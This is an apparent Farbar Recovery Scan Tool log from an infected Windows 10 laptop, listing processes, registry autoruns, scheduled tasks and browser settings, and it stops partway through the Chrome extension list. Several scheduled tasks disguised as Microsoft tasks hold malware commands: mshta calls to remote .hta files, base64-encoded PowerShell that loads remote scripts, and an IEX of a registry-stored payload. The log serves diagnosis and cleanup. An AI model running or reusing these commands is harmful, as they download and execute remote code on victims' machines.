Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-01-2020

Ran by Admin (administrator) on DESKTOP-9TP1502 (Hewlett-Packard HP EliteBook 8560p) (29-01-2020 16:49:32)
Running from C:\Users\Admin\Documents
Loaded Profiles: Admin (Available Profiles: Admin)
Platform: Windows 10 Pro Version 1909 18363.535 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files\FileBX\Fbx32helper.exe
() [File not signed] C:\Users\Admin\AppData\Local\Temp\crack.exe
() [File not signed] C:\Users\Admin\Downloads\Utils\StartUp\Double Right-Click = Middle-Click AHK\Double Right-Click = Middle-Click.exe
(Adobe Inc. -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\acrotray.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common
Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGSService.exe
(Alexandr Irza) [File not signed]
C:\Users\Admin\Downloads\Utils\Volume2\Volume2.exe
(Arvato Digital Services Canada Inc -> arvato digital services llc) C:\Program
Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(GuinpinSoft inc) [File not signed] C:\Program Files\Common
Files\cdarbsvc\cdarbsvc_v1.0.0_x64.exe
(Hyperionics Technology LLC) [File not signed] C:\Program Files\FileBX\FileBX.exe
(Lagerkvist Teknisk Rådgivning i Borås HB -> Olof Lagerkvist)
C:\Windows\System32\imdsksvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common
Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation)
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.222.1110.0006\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation)
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common
Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MRT.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\msdt.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\sdiagnhost.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD)
C:\Windows\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD)
C:\Windows\System32\atiesrxx.exe
(Open-Shell) [File not signed] C:\Program Files\Open-Shell\StartMenu.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common
Files\Java\Java Update\jusched.exe
(Oracle Corporation) [File not signed] C:\ProgramData\Oracle\Java\java.exe
(Oracle Corporation) [File not signed] C:\ProgramData\Oracle\Java\java.exe
(Reason Software Company Inc. -> Reason Software Company Inc.) C:\Program Files
(x86)\Unchecky\bin\unchecky_bg.exe
(Reason Software Company Inc. -> Reason Software Company Inc.) C:\Program Files
(x86)\Unchecky\bin\unchecky_svc.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program
Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program
Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program
Files\Synaptics\SynTP\SynTPHelper.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Open-Shell Start Menu] => C:\Program Files\Open-Shell\StartMenu.exe [224768 2019-12-04] (Open-Shell) [File not signed]
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [crack] => C:\Users\Admin\AppData\Local\Temp\crack.exe [496128 2015-06-21] () [File not signed] <==== ATTENTION
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common
Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. ->
Oracle Corporation)
HKLM-x32\...\Run: [QuickFinder Scheduler] => c:\Program Files
(x86)\Corel\WordPerfect Office X9\Programs\QFSCHD190.EXE [247512 2018-05-13] (Corel
Corporation -> Corel Corporation)
HKLM-x32\...\Run: [PdxRegCl] => C:\Program Files
(x86)\Paradox\Programs\PdxRegCl.exe [54632 2010-10-27] (Corel Corporation -> Corel
Corporation)
HKLM\...\Policies\Explorer: [NoRecentDocsHistory] 1
HKLM\...\Policies\Explorer: [NoDrivesInSendToMenu] 1
HKLM\ DisallowedCertificates: 1990649205B55EAB5D692E9EDB1BE0DDD3B037DE (U)
HKLM\ DisallowedCertificates: 3AD010247A8F1E991F8DDE5D47989CB5202E5614 (U)
HKLM\ DisallowedCertificates: 6A2C691767C2F1999B8C020CBAB44756A99A0C41 (U)
HKLM\ DisallowedCertificates: 6B6FA65B1BDC2A0F3A7E66B590F93297B8EB56B9 (U)
HKLM\ DisallowedCertificates: 8835437D387BBB1B58FF5A0FF8D003D8FE04AED4 (U)
HKLM\ DisallowedCertificates: 9FEB091E053D1C453C789E8E9C446D31CB177ED9 (U)
HKLM\ DisallowedCertificates: C597D4E7FF9CE5BD3EC321C11827FCA9294A6BA1 (U)
HKLM\ DisallowedCertificates: D3FD325D0F2259F693DD789430E3A9430BB59B98 (U)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Run: [Volume2] =>
C:\Users\Admin\Downloads\Utils\Volume2\Volume2.exe [4798976 2019-07-19] (Alexandr
Irza) [File not signed]
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Run: [crack] =>
C:\Users\Admin\AppData\Local\Temp\crack.exe [496128 2015-06-21] () [File not
signed] <==== ATTENTION
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[NoDrivesInSendToMenu] 1
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[HideSCAVolume] 0
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[NoRecentDocsHistory] 1
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[NoRecentDocsMenu] 1
HKU\S-1-5-21-957440600-544596904-2528706255-1001\Control
Panel\Desktop\\SCRNSAVE.EXE -> C:\WEP\IDLEWILD.EXE
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-16] (Google LLC -> Google LLC)
AppInit_DLLs: ldntvdm.dll => C:\Windows\system32\ldntvdm.dll [18432 2019-01-25]
(Microsoft Corporation) [File not signed]
IFEO\notepad.exe: [Debugger]
"C:\Users\Admin\Downloads\Utils\Notepad3Portable\Notepad3Portable.exe" -z
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\Caffeine.exe.lnk [2019-12-03]
ShortcutTarget: Caffeine.exe.lnk -> C:\Utils\StartUp\Caffeine.exe (No File)
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\crack.exe [2015-06-21] () [File not signed]
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\Double Right-Click = Middle-Click.exe.lnk [2020-01-05]
ShortcutTarget: Double Right-Click = Middle-Click.exe.lnk ->
C:\Users\Admin\Downloads\Utils\StartUp\Double Right-Click = Middle-Click AHK\Double
Right-Click = Middle-Click.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FileBox
eXtender.lnk [2019-12-21]
ShortcutTarget: FileBox eXtender.lnk -> C:\Program Files\FileBX\FileBX.exe
(Hyperionics Technology LLC) [File not signed]
GroupPolicy\User: Restriction ? <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0CB832CC-09B7-4E30-B277-D55D4BE4BDF6} - System32\Tasks\Norton Remove and Reinstall\Norton Remove and Reinstall => C:\Users\Admin\Downloads\CleanWipe\NRnR.exe
Task: {1624BFAE-09F2-4C28-AE31-1E887C96268E} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup =>
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe
[469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {23E5EB0F-E787-40DE-9A1A-3A7F2AEA1F42} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification =>
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe
[469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2D9160F9-A1CE-4ED2-BF6B-5A040087277E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {31861349-4539-4A33-99A1-EEBCB7D64831} -
System32\Tasks\Microsoft\Windows\UPnP\UPnPHost => C:\Windows\System32\cmd.exe /c
mshta hxxp://qlqd5zqefmkcr34a.onion.pet/win/checking.hta <==== ATTENTION
Task: {33BE6AC3-8AC5-4F66-BDC1-BF04A162B0FD} -
System32\Tasks\Microsoft\Windows\MobilePC\DetectPC =>
C:\Windows\System32\cmd.exe /c C:\Windows\Fonts\sasd.bat
Task: {3B55A0AB-9B7C-4EE6-AE25-8D0778462710} -
System32\Tasks\Microsoft\Windows\Shell\updshell => cmd /c sc start WinDefends
Task: {3D0FACDF-4FFC-4369-9850-CAAAC2273F03} -
System32\Tasks\Microsoft\Windows\Shell\WindowsShellUpdate =>
C:\Windows\System32\cmd.exe /c mshta hxxp://195.123.234.33/win/update.hta <====
ATTENTION
Task: {40D3A1B4-4444-4366-84DB-74BD9125B41F} -
System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files
(x86)\Corel\CUH\v2\CUH.exe [1677600 2019-09-06] (Corel Corporation -> Corel
Corporation)
Task: {420DDE2F-37E4-4C15-917D-5A951944B140} -
System32\Tasks\Microsoft\Windows\Autochk\SystemProxy => cmd /c sc start thundersec
Task: {4A86C2A9-9A94-4417-9ADF-C2950EB7D62E} -
System32\Tasks\Microsoft\Windows\EDP\EDP App Lock Task =>
C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <====
ATTENTION
Task: {637173A8-4D01-4881-9C0D-D552128FB844} -
System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB =>
C:\Windows\system32\MRT.exe [129221664 2019-12-13] (Microsoft Windows -> Microsoft
Corporation)
Task: {7BCE35A1-403F-417D-BB2C-5C3AEF69FBEC} -
System32\Tasks\Microsoft\Windows\Registry\RegBackup =>
C:\Windows\System32\cmd.exe /c schtasks /tn
\Microsoft\Windows\Bluetooth\UpdateDeviceTask /run
Task: {7E8EE202-2A2E-4773-AC5C-E6B4FEB9E775} - System32\Tasks\Adobe Acrobat Update
Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656
2019-09-11] (Adobe Inc. -> Adobe Systems)
Task: {8F5041C7-629C-4FC7-A9F8-E4EF3F5633C3} -
System32\Tasks\Microsoft\Windows\EDP\EDP App Update Cache =>
C:\Windows\System32\cmd.exe /c mshta hxxps://asq.r77vh0.pw/win/hssl/r7.hta <====
ATTENTION
Task: {95E3F157-8062-43CA-A7C1-5F4B3188AAC2} - System32\Tasks\Synaptics TouchPad
Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2824792 2017-08-25]
(Synaptics Incorporated -> Synaptics Incorporated)
Task: {A2E25CD4-7C14-4F08-8CCB-4FC60D6938AA} -
System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files
(x86)\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)
Task: {AB209B9C-0016-4F8A-BA7D-6EE5F84FEB92} -
System32\Tasks\Microsoft\Windows\Bluetooth\UpdateDeviceTask =>
C:\ProgramData\Oracle\Java\java.exe [ ]
Task: {AFEB3C40-5803-43B4-9FC1-FE60C9CEC7D2} -
System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
Files-S-3-5-21-2236678156-433529325-2142214268-1138 => cmd /c powershell -nop -noni
-w 1 -enc
cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBxAC4AZAA
2AHMAaABpAGkAdwB6AC4AcAB3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG
8AYgBqAC4AZABsAGwA
Task: {C768FC0D-FFC7-4533-9D15-7F25BFEADCF3} -
System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
Files-S-3-5-21-2236678155-433529325-2142214968-1138 => cmd /c powershell -nop -noni
-w 1 -enc
cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBxAC4AcgA
3ADcAdgBoADAALgBwAHcALwB3AGkAbgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAG
oALgBkAGwAbAA=
Task: {C802F363-CF2D-4AC7-93EA-D560CDE80235} -
System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
=> cmd /c powershell -nop -noni -w 1 -enc
cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADkANQAuADEAMgA
zAC4AMgAzADQALgAzADMALwB3AGkAbgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAG
oALgBkAGwAbAA=
Task: {D596E2AC-2F20-4FD3-AADA-3A4F2FE6EC3B} - System32\Tasks\Update Shell =>
powershell -w 1 -C IEX
([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($
(Get-ItemProperty -Path HKCU:\Software\cr -Name d -ErrorAction Stop).d)))
Task: {DA32F164-750E-4CEE-B8E6-31D53A6FC945} -
System32\Tasks\Microsoft\Windows\UPnP\UPnPClient Task =>
C:\Windows\System32\cmd.exe /c mshta hxxps://asq.d6shiiwz.pw/win/hssl/d6.hta <====
ATTENTION
Task: {EA4A5FC7-BDDB-4EB3-8A8E-80BFCBEA953E} -
System32\Tasks\Microsoft\Windows\Shell\WinShell => C:\Windows\System32\cmd.exe /c
mshta hxxp://195.123.234.33/win/checking.hta <==== ATTENTION
Task: {ECE0A289-26F2-4CBE-81D5-129713A3832B} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan
=> C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe
[469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F128192E-10B0-4BA2-A028-D386FD15BDA5} -
System32\Tasks\Microsoft\Windows\MUI\LPupdate => C:\Windows\System32\cmd.exe /c
powershell -exec bypass C:\Windows\Fonts\del.ps1
Task: {F581427B-7FB0-47BB-9527-2C2F6DA884A0} - System32\Tasks\AdobeGCInvoker-1.0 =>
C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe
[2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {F8EADFDE-3249-496D-8D0B-FFA45E3615EA} -
System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files
(x86)\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The
file which is running by the task will not be moved.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.50.1
Tcpip\..\Interfaces\{2b857c52-1387-4b35-a4e8-0e3bef81c552}: [NameServer]
1.1.1.1,8.8.8.8
Tcpip\..\Interfaces\{2b857c52-1387-4b35-a4e8-0e3bef81c552}: [DhcpNameServer]
192.168.50.1

Internet Explorer:
==================
HKU\S-1-5-21-957440600-544596904-2528706255-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} ->
C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\x64\AcroIEFavStub.dll [2017-04-24] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2017\x64\AcroIEFavStub.dll [2017-04-24] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} ->
C:\Program Files (x86)\Java\jre1.8.0_241\bin\ssv.dll => No File
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910}
-> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\AcroIEFavStub.dll [2017-04-24] (Adobe Systems,
Incorporated -> Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->
C:\Program Files (x86)\Java\jre1.8.0_241\bin\jp2ssv.dll => No File
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2017\AcroIEFavStub.dll [2017-04-24] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2017\x64\AcroIEFavStub.dll [2017-04-24] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2017\AcroIEFavStub.dll [2017-04-24] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Filter: text/xml - {807563E5-5146-11D5-A672-00B0D022E945} -
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL No File
FireFox:
========
FF HKLM\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] - C:\Program Files (x86)\Adobe\Acrobat 2017\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat 2017\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2019-11-28]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] - C:\Program Files (x86)\Adobe\Acrobat 2017\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Plugin-x32: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files
(x86)\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files
(x86)\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files
(x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2019-12-13] (Google LLC ->
Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files
(x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2019-12-13] (Google LLC ->
Google LLC)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\Air\nppdf32.dll [2019-11-28] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default [2020-01-29]
CHR HomePage: Default -> hxxps://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.cnet.com/","hxxp://iron-start.com/","hxxps://www.google.com/","hxxp://www.google.com","hxxp://home.torchbrowser.com","hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxps://www.virustotal.com/gui/images/manifest/icon-192x192.png
CHR Session Restore: Default -> is enabled.
CHR Extension: (Slides) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-12-03]
CHR Extension: (Flash Video Downloader) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2019-12-03]
CHR Extension: (BetterTTV) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2020-01-21]
CHR Extension: (Docs) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-12-03]
CHR Extension: (Google Drive) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-12-03]
CHR Extension: (Tidy Bookmarks) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\bennikkpnelmfdiijpdclfincmnoabae [2019-12-03]
CHR Extension: (YouTube) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-12-03]
CHR Extension: (Search by Image) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\cnojnbdhbhnkbcieeekonklommdnndci [2020-01-21]
CHR Extension: (Tampermonkey) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2019-12-03]
CHR Extension: (VirusTotal) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\dnopbpmlkabcondfpckfnhgabfcncjmg [2019-12-03]
CHR Extension: (Adobe Acrobat) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-12-21]
CHR Extension: (MyJDownloader Browser Extension) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\fbcohnmimjicjdomonkcbcpbpnhggkip [2019-12-19]
CHR Extension: (Sheets) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-12-03]
CHR Extension: (Chrome Shortcuts) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\fmemikdglgekjjclafhhebcdapfcbhap [2019-12-03]
CHR Extension: (Nano Adblocker) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\gabbbocakeomblphkmmnoamkioajlkfo [2020-01-05]
CHR Extension: (Nano Defender) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\ggolfgbegefeeoocgjbmkembbncoadlb [2020-01-21]
CHR Extension: (LastPass: Free Password Manager) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-01-29]
CHR Extension: (Refined GitHub) - C:\Users\Admin\AppData\Local\Google\Chrome\User
